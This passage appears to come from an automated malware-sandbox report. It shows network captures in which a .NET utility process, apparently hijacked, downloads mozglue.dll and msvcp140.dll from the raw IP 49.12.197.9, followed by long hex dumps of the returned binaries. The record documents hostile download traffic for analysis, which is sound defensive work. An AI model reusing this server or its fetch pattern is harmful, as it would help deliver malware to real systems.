                                                                                                                                                                  2024-10-03 01:36:09 UTC16384INData Raw: 7d 88 89 f8 f7 65 c8 89 55 84 89 85 0c fd ff ff 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff
                                                                                                                                                                  Data Ascii: }eUeLXee0@eeeue0UEeeUeee $
                                                                                                                                                                  2024-10-03 01:36:09 UTC16384INData Raw: 38 8b 4f 34 89 4d e4 8b 4f 30 89 4d d4 8b 4f 2c 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80
                                                                                                                                                                  Data Ascii: 8O4MO0MO,MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEE
                                                                                                                                                                  2024-10-03 01:36:09 UTC16384INData Raw: 1c c1 ee 1a 01 c2 89 95 08 ff ff ff 8b bd 2c ff ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6
                                                                                                                                                                  Data Ascii: ,0<48%8A)$


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  12192.168.2.64973349.12.197.94435576C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2024-10-03 01:36:10 UTC195OUTGET /mozglue.dll HTTP/1.1
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                  Host: 49.12.197.9
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  2024-10-03 01:36:11 UTC262INHTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx
                                                                                                                                                                  Date: Thu, 03 Oct 2024 01:36:11 GMT
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  Content-Length: 608080
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Last-Modified: Thursday, 03-Oct-2024 01:36:11 GMT
                                                                                                                                                                  Cache-Control: no-store, no-cache
                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                  2024-10-03 01:36:11 UTC16122INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00
                                                                                                                                                                  Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
                                                                                                                                                                  2024-10-03 01:36:11 UTC16384INData Raw: c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 31 ff ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00
                                                                                                                                                                  Data Ascii: #H1A$P~#HbA$P~#HUVuF|FlNhFdFhFTNP
                                                                                                                                                                  2024-10-03 01:36:11 UTC16384INData Raw: ff 8b 45 a8 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c
                                                                                                                                                                  Data Ascii: EPzEPWxP1`PHP$,FM1R'^_[]00L9tc<
                                                                                                                                                                  2024-10-03 01:36:11 UTC16384INData Raw: 06 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9
                                                                                                                                                                  Data Ascii: )0LY)0LZ|!i(0C}L8!i(0u9Gu)0E8)0}L
                                                                                                                                                                  2024-10-03 01:36:11 UTC16384INData Raw: 83 c4 04 89 45 f0 8b 06 8b 4e 04 85 c9 0f 8e b3 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89
                                                                                                                                                                  Data Ascii: EN1B]zB|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSRE
                                                                                                                                                                  2024-10-03 01:36:11 UTC16384INData Raw: 42 fd ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc
                                                                                                                                                                  Data Ascii: BH) sH) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) s
                                                                                                                                                                  2024-10-03 01:36:11 UTC16384INData Raw: 00 00 85 db 0f 85 ad 07 00 00 c7 44 24 30 00 00 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34
                                                                                                                                                                  Data Ascii: D$0D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F|$4rD$ D$ WVjjPS,VL$4
                                                                                                                                                                  2024-10-03 01:36:11 UTC16384INData Raw: 8b b8 08 00 00 00 85 ff 0f 84 0b 06 00 00 83 fb 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c
                                                                                                                                                                  Data Ascii: D$4P<|$\$t@)GD$ P08z.Jt_@u`|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<
                                                                                                                                                                  2024-10-03 01:36:11 UTC16384INData Raw: 83 e1 fe 83 e0 01 09 c8 89 42 04 89 13 8d 44 24 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b
                                                                                                                                                                  Data Ascii: BD$XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKN
                                                                                                                                                                  2024-10-03 01:36:11 UTC16384INData Raw: b9 00 00 00 00 0f 44 4c 24 04 31 db 39 c1 0f 97 c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48
                                                                                                                                                                  Data Ascii: DL$19rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  13192.168.2.64973549.12.197.94435576C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2024-10-03 01:36:12 UTC196OUTGET /msvcp140.dll HTTP/1.1
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                  Host: 49.12.197.9
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  2024-10-03 01:36:13 UTC262INHTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx
                                                                                                                                                                  Date: Thu, 03 Oct 2024 01:36:13 GMT
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  Content-Length: 450024
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Last-Modified: Thursday, 03-Oct-2024 01:36:13 GMT
                                                                                                                                                                  Cache-Control: no-store, no-cache
                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                  2024-10-03 01:36:13 UTC16122INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
                                                                                                                                                                  2024-10-03 01:36:13 UTC16384INData Raw: 72 00 2d 00 62 00 61 00 00 00 68 00 72 00 2d 00 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d
                                                                                                                                                                  Data Ascii: r-bahr-hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnm
                                                                                                                                                                  2024-10-03 01:36:13 UTC16384INData Raw: 00 00 04 00 00 00 04 8b 00 10 18 8b 00 10 78 8a 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff
                                                                                                                                                                  Data Ascii: x{|L@DX}0}}M@4}0}}4M@tXM}0}}XM
                                                                                                                                                                  2024-10-03 01:36:13 UTC16384INData Raw: d9 00 0f bf 45 fc d9 5d e8 d9 45 10 d9 45 e8 d9 c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45
                                                                                                                                                                  Data Ascii: E]EEE]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u|_E^UQQMuU]EDB]ED{nt]B]E
                                                                                                                                                                  2024-10-03 01:36:13 UTC16384INData Raw: 03 f7 0f b7 06 83 f8 61 74 05 83 f8 41 75 0f 03 f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b
                                                                                                                                                                  Data Ascii: atAuf;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90ut
                                                                                                                                                                  2024-10-03 01:36:13 UTC16384INData Raw: c0 75 03 8d 41 1c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc
                                                                                                                                                                  Data Ascii: uAUjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jj
